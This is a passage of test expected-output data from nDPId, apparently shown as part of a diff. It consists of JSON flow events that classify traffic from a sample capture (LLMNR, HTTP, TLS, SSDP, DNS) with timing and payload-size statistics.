00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -653,21 +653,21 @@
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
